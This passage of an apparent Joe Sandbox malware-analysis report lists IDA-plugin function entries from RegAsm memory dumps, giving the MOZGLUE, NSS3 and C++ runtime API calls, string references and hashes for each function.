??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CBE9
std::_Facet_Register.LIBCPMT ref: 6C79CBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C79CC65

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 45e12bfa62b2818455552cf053c888578e251119d195c210996750c4b3da2a59
Instruction ID: 9f0139f14f828b2ecc1364e0381c5f3f5d1c0a4fe2ddd4142b7c93ade09f49a1
Opcode Fuzzy Hash: 45e12bfa62b2818455552cf053c888578e251119d195c210996750c4b3da2a59
Instruction Fuzzy Hash: 4441A0707002098FDF00EF69D989AAD77B5FF89355F044078E90A9B751DB35E904CBA1

Function 6C7A5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5DC9
std::_Facet_Register.LIBCPMT ref: 6C7A5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C7A5C8C,?,6C77E829), ref: 6C7A5E45

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a065b7c638c4004862ce508c693bc31e2e633b3d0fb64a6735e2d64308a4c183
Instruction ID: 646c1d7b17228bb6ef893003cad81d0f4e8febc4e7abec07eee8d7f6f38bc50d
Opcode Fuzzy Hash: a065b7c638c4004862ce508c693bc31e2e633b3d0fb64a6735e2d64308a4c183
Instruction Fuzzy Hash: 06417D707002059FCB10DFA5D9DDAAE77B9EF89318F144178E50AAB791EB30A906CB61

Function 6C77CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7431A7), ref: 6C77CDDD

Strings

<jemalloc>, xrefs: 6C77CF9F, 6C77CFB3
: (malloc) Error in VirtualFree(), xrefs: 6C77CFA4, 6C77CFB8

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 0f6de346a69d492067a7119de0a4af0f2f8974255e76e994da1564ea5fce8672
Instruction ID: d6b19969dc3f5dea7f7577580465282fb910af00abb2e2cc88beff8eb2a627c7
Opcode Fuzzy Hash: 0f6de346a69d492067a7119de0a4af0f2f8974255e76e994da1564ea5fce8672
Instruction Fuzzy Hash: 3731A53174120E5FFF20AE658E45B6E7B79AB49715F304035F610ABB80DBB0E50087B1

Function 6C74BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C74BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74BD06

Strings

0, xrefs: 6C74BBCD
y, xrefs: 6C74BC4E
0, xrefs: 6C74BC74

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 68c190f02895ba41067319b00008146a6a3d4de911f8ab10d528b6fbdd149cbb
Instruction ID: 7a532c37f1e77fd082d1e7f51d76f42307d68e35fb7fd2a154941827004ccdcc
Opcode Fuzzy Hash: 68c190f02895ba41067319b00008146a6a3d4de911f8ab10d528b6fbdd149cbb
Instruction Fuzzy Hash: 6761C371A08B458FC714CF28C695A5FB7E9EF89348F008A2DE88597651DB30ED49CB92

Function 6C74ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C74F100: LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
Part of subcall function 6C74F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C74ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C74EDCC
CreateFileW.KERNEL32 ref: 6C74EE08
free.MOZGLUE(00000000), ref: 6C74EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C74EE32

Part of subcall function 6C74EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C74EBB5
Part of subcall function 6C74EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C77D7F3), ref: 6C74EBC3
Part of subcall function 6C74EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C77D7F3), ref: 6C74EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C74EDC1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: a49eafc7957bc5b18886a6633252218ef3ba660cbdba2e4ffdf17e7d306ef83b
Instruction ID: b1e25b6fac9c17c9f3259cebc4942f44823c76dbc6f2d20c4a7e92948fef5dfb
Opcode Fuzzy Hash: a49eafc7957bc5b18886a6633252218ef3ba660cbdba2e4ffdf17e7d306ef83b
Instruction Fuzzy Hash: 4C51C371D052188BEB00DF68CA497EEF7B4AF59328F44C52DE8556B740E7306948CBE2

Function 6C750A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750A72

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

moz_xmalloc.MOZGLUE(?,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750AF5
free.MOZGLUE(00000000,?,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750B9F
free.MOZGLUE(?,?,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750BDB
free.MOZGLUE(00000000,?,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C7AB80C,00000000,?,?,6C75003B,?), ref: 6C750C0A

Strings

alloc overflow, xrefs: 6C750C05

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: a766c904f3f9027b4f97492ecffb436bc07877a12f853e39b4535ebfc136ba51
Instruction ID: 66586e2d58e8694bf0b6d3f82233769694ff7b90f702bad2133802fdadfe208b
Opcode Fuzzy Hash: a766c904f3f9027b4f97492ecffb436bc07877a12f853e39b4535ebfc136ba51
Instruction Fuzzy Hash: 1C51B0B4A042468FDB14CF18CAC4B5EB3B5FF4430CF54496DC85A9BA02EF71A564CB51

Function 6C7BA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA565

Part of subcall function 6C7BA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BA4BE
Part of subcall function 6C7BA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7BA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7BA6B6

Strings

0, xrefs: 6C7BA5FB
z, xrefs: 6C7BA6AE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 210758d4d732f92b2ff17585851a13508c58e86caa5740b46a250de3e9db52ea
Instruction ID: 94445fd055000fda6fb0d1b30f175622b3c33076b47644d5197319dcc0226d0f
Opcode Fuzzy Hash: 210758d4d732f92b2ff17585851a13508c58e86caa5740b46a250de3e9db52ea
Instruction Fuzzy Hash: AF413A719087459FC341DF28C584A8BBBE5BF89358F408A2EF49997650E730E649CB93

Function 6C89ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C89ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C89AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C89AD23

Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963

PR_LogPrint.NSS3(?,00000000), ref: 6C89AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C89AD1C
hSession = 0x%x, xrefs: 6C89ACFE, 6C89AD0E
C_MessageDecryptFinal, xrefs: 6C89ACE1

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 78622b3db11fd2e590c4f6dbe3d7886469a52bc88116157166ffbad72ccbbbc9
Instruction ID: 2ab68d63e48f5061c37e3a417af2617b9717e0447643dc581f280bf1ee12813c
Opcode Fuzzy Hash: 78622b3db11fd2e590c4f6dbe3d7886469a52bc88116157166ffbad72ccbbbc9
Instruction Fuzzy Hash: 4D216B71A05104DFDB20DB6CDE88BAA33B4BB4270EF150835E40A97761DB30DA08C7A2

Function 6C878CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C88124D,00000001), ref: 6C878D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C88124D,00000001), ref: 6C878D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D73
PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D8C

Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878DBA

Strings

KRAM, xrefs: 6C878CF9
KRAM, xrefs: 6C878D3E

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: f52016b077cd044aac0697128ddf1e48d13e1d9fdaa2965d2feb4f2234dde0f9
Instruction ID: 405ec2b6d7bd79be22637342a58ea89f180f93258fcec2da965fcefbad9547ab
Opcode Fuzzy Hash: f52016b077cd044aac0697128ddf1e48d13e1d9fdaa2965d2feb4f2234dde0f9
Instruction Fuzzy Hash: 062181B5A046058FCB20EF38C68456EBBF0FF55319F158D6AD89897701E734E881CBA1

Function 6C7478C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C7C008B), ref: 6C747B89
free.MOZGLUE(?,6C7C008B), ref: 6C747BAC

Part of subcall function 6C7478C0: free.MOZGLUE(?,6C7C008B), ref: 6C747BCF

free.MOZGLUE(?,6C7C008B), ref: 6C747BF2

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 608e3074081c3e9759c4fe21a5b286a49041a3e27a7a09178cbfe244e00e6553
Instruction ID: ad2b810c4ff4a2a795ce9fb6fcc2fac03018b9ad6f151d64a19e9aac4d23cb81
Opcode Fuzzy Hash: 608e3074081c3e9759c4fe21a5b286a49041a3e27a7a09178cbfe244e00e6553
Instruction Fuzzy Hash: 9FC1B431E011288BEB24CB28DE94B9DB772BF41318F1587A9D51AABBC1C7319E85CF51

Function 6C78DF60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78DF7D
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78DF8A
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78DFC9
GetCurrentThreadId.KERNEL32 ref: 6C78DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78E000

Strings

[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C78E00E
<none>, xrefs: 6C78DFD7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpid
String ID: <none>$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1430161788-1978395012
Opcode ID: b3e79289d8ea3b32ab43cbdcf69827389e3eea5871416e2c0bb138fb867ac0ac
Instruction ID: c909eef0434612b5cbee521503e73beee57acf84aab81ebf30b2f6efb737d906
Opcode Fuzzy Hash: b3e79289d8ea3b32ab43cbdcf69827389e3eea5871416e2c0bb138fb867ac0ac
Instruction Fuzzy Hash: 8411C131B026179FDB109FA8CA585AA7775EF4970DF000036FE2657702C731AB01CBAA

Function 6C789420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
__Init_thread_footer.LIBCMT ref: 6C78949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C78946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C78947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C789459

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
Instruction ID: 4da71c6ef3f07078c10d09b33c0c791cb7ac63c59596acb3bf38808741fb11b0
Opcode Fuzzy Hash: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
Instruction Fuzzy Hash: 3B01FC70B011038FDB109B6DDF15A4633B5EB05329F040537EE2E86B51D635E7A48957

Function 6C8A0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000,?,?), ref: 6C8A0CB3

Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DEC

Part of subcall function 6C8C0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C862AF5,?,?,?,?,?,6C860A1B,00000000), ref: 6C8C0F1A
Part of subcall function 6C8C0F10: malloc.MOZGLUE(00000001), ref: 6C8C0F30
Part of subcall function 6C8C0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8C0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000), ref: 6C8A0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000), ref: 6C8A0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E79

Part of subcall function 6C8B1560: TlsGetValue.KERNEL32(00000000,?,6C880844,?), ref: 6C8B157A
Part of subcall function 6C8B1560: EnterCriticalSection.KERNEL32(?,?,?,6C880844,?), ref: 6C8B158F
Part of subcall function 6C8B1560: PR_Unlock.NSS3(?,?,?,?,6C880844,?), ref: 6C8B15B2

Part of subcall function 6C87B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C881397,00000000,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1CB
Part of subcall function 6C87B1A0: free.MOZGLUE(5B5F5EC0,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1D2

